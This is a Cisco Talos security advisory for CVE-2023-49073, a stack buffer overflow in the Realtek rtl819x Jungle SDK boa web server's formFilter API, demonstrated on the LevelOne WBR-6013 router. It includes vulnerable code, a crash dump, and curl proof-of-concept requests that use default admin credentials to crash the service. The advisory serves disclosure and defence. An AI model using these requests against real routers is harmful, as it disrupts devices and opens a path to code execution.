CVE-2023-49073
A stack-based buffer overflow vulnerability exists in the boa formFilter functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of HTTP requests can lead to arbitrary code execution. An attacker can send a sequence of requests to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623
Realtek rtl819x Jungle SDK v3.4.11
rtl819x Jungle SDK - https://www.realtek.com/en/ WBR-6013 - https://www.level1.com/level1_en/wbr-6013-n300-wireless-router-54069103
7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-121 - Stack-based Buffer Overflow
The rtl819x Jungle SDK is an SDK for routers. This SDK uses as web server boa.
This Realtek rtl819x Jungle SDK vulnerability was found while researching the Levelone WBR-6013 router. We are going to explain this vulnerability from the perspective of the WBR-6013 router.
The WBR-6013 router has a web server called boa. The version used in the device is a Realtek’SDK that uses boa. One of the SDK’s API is /boafrm/formFilter. This API allows creation of filters for restraining connections to internet. The function responsible for this API is boa’s formFilter:
void formFilter(request *wp, char *path, char *query)
{
[...]
IPFILTER_T ipEntry, ipentrytmp;
[...]
[1] strAddIp = req_get_cstream_var(wp, ("addFilterIp"), "");
[...]
if (strAddIp[0]) {
strVal = req_get_cstream_var(wp, ("ip"), "");
[2] strIP6 = req_get_cstream_var(wp, ("ip6addr"), "");
ip6Enable = req_get_cstream_var(wp, ("ip6_enabled"), "");
ip4Enable = req_get_cstream_var(wp, ("ip_enabled"), "");
[...]
if(strIP6[0]){
ipEntry.ipVer=IPv6;
[3] strcpy(ipEntry.ip6Addr,strIP6);
}
[...]
}
[...]
}
At [1] the addFilterIp request’s parameter is fetched and, if not empty, the code at [2] will be executed. At [2] the ip6addr request’s parameter is fetched and used at [3] if its value is not empty. At [3] the value of the ip6addr request’s parameter is copied in the ip6Addr struct member of the ipEntry stack variable.
Because no checks are performed on the size of the ip6addr request’s parameter string, a buffer overflow can occur at [3] in the stack variable ipEntry. An attacker could exploit this vulnerability to achieve arbitrary code execution.
Program received signal SIGSEGV, Segmentation fault.
0x00415c48 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────── registers ──────────────────────────────
$zero: 0x00000000 → 0x00000000
$at : 0xfffffff8 → 0xfffffff8
$v0 : 0x408003da → 0x41414141 → 0x41414141 ("AAAA"?)
$v1 : 0x41414141 → 0x41414141 ("AAAA"?)
$a0 : 0x00000000 → 0x00000000
$a1 : 0x004c0404 → 0x00414141 → 0x02ffff02 → 0x02ffff02
$a2 : 0x3ff82f00 → 0x00000000 → 0x00000000
$a3 : 0x004c0240 → 0x41414141 → 0x41414141 ("AAAA"?)
$t0 : 0x004c05f8 → 0x41410065 → 0x41410065
$t1 : 0x41414141 → 0x41414141 ("AAAA"?)
$t2 : 0x00000b59 → 0x00000b59
$t3 : 0x41414141 → 0x41414141 ("AAAA"?)
$t4 : 0x41414141 → 0x41414141 ("AAAA"?)
$t5 : 0x41414141 → 0x41414141 ("AAAA"?)
$t6 : 0x41414141 → 0x41414141 ("AAAA"?)
$t7 : 0x004b0000 → 0x004b0000
$s0 : 0x004c28d0 → 0x00000005 → 0x00000005
$s1 : 0x004a0000 → 0x0049e9d0 → 0x456c2041 → 0x456c2041 ("El A"?)
$s2 : 0x408003c0 → 0x00000000 → 0x00000000
$s3 : 0x00020078 → 0x00020078
$s4 : 0x004a0adc → 0x00000000 → 0x00000000
$s5 : 0x004a0000 → 0x0049e9d0 → 0x456c2041 → 0x456c2041 ("El A"?)
$s6 : 0x004a0adc → 0x00000000 → 0x00000000
$s7 : 0x004c0220 → 0x31003070 → 0x31003070
$t8 : 0x004b5650 → 0x3ff44ff0 → 0x00801021 → 0x00801021
$t9 : 0x3ff44ff0 → 0x00801021 → 0x00801021
$k0 : 0x00000000 → 0x00000000
$k1 : 0x00000000 → 0x00000000
$s8 : 0x004a0adc → 0x00000000 → 0x00000000
$pc : 0x00415c48 → 0x80620000 → 0x80620000
$sp : 0x40800290 → 0x00000000 → 0x00000000
$hi : 0x0000006b → 0x0000006b
$lo : 0x000394d1 → 0x000394d1
$fir : 0x00739300 → 0x00739300
$ra : 0x00415c38 → 0x8fa30224 → 0x8fa30224
$gp : 0x3ff875c0 → 0x6c5f636f → 0x6c5f636f ("l_co"?)
────────────────────────────── stack ──────────────────────────────
0x40800290│+0x0000: 0x00000000 → 0x00000000 ← $sp
0x40800294│+0x0004: 0x00000000 → 0x00000000
0x40800298│+0x0008: 0x00000000 → 0x00000000
0x4080029c│+0x000c: 0x00000000 → 0x00000000
0x408002a0│+0x0010: 0x40007010 → 0x00000000 → 0x00000000
0x408002a4│+0x0014: 0x00000000 → 0x00000000
0x408002a8│+0x0018: 0x3ff29698 → 0x00000000 → 0x00000000
0x408002ac│+0x001c: 0x3ff2c728 → 0x005f474c → 0x005f474c
────────────────────────────── code:mips:MIPS32 ──────────────────────────────
0x415c3c j 0x415c48
0x415c40 nop
0x415c44 sb v0, 378(sp)
→ 0x415c48 lb v0, 0(v1)
0x415c4c nop
0x415c50 beqz v0, 0x415cb4
0x415c54 move a0, v1
0x415c58 addiu a1, sp, 304
0x415c5c jal 0x402780
────────────────────────────── threads ──────────────────────────────
[#0] Id 1, stopped 0x415c48 in ?? (), reason: SIGSEGV
To use a specific API of the web server, because of a CSRF protection mechanism, it is necessary to load the HTML page that would call that API:
curl --user admin:admin http://<DEVICE_IP>/ip6filter.htm &>/dev/null
After this request it is possible to use the /boafrm/formFilter API:
curl -d "addFilterIp=1&ip6addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -X POST -H "Content-Type: application/x-www-form-urlencoded" --user admin:admin http://<DEVICE_IP>/boafrm/formFilter
After the request the boa process will crash. The POC uses the default admin credentials.
Realtek has provided updates software to their customers. LevelOne has declined to patch the issues in their software.
2023-12-14 - Initial Vendor Contact
2023-12-22 - Vendor Disclosure
2024-05-20 - Vendor Patch Release
2024-07-08 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.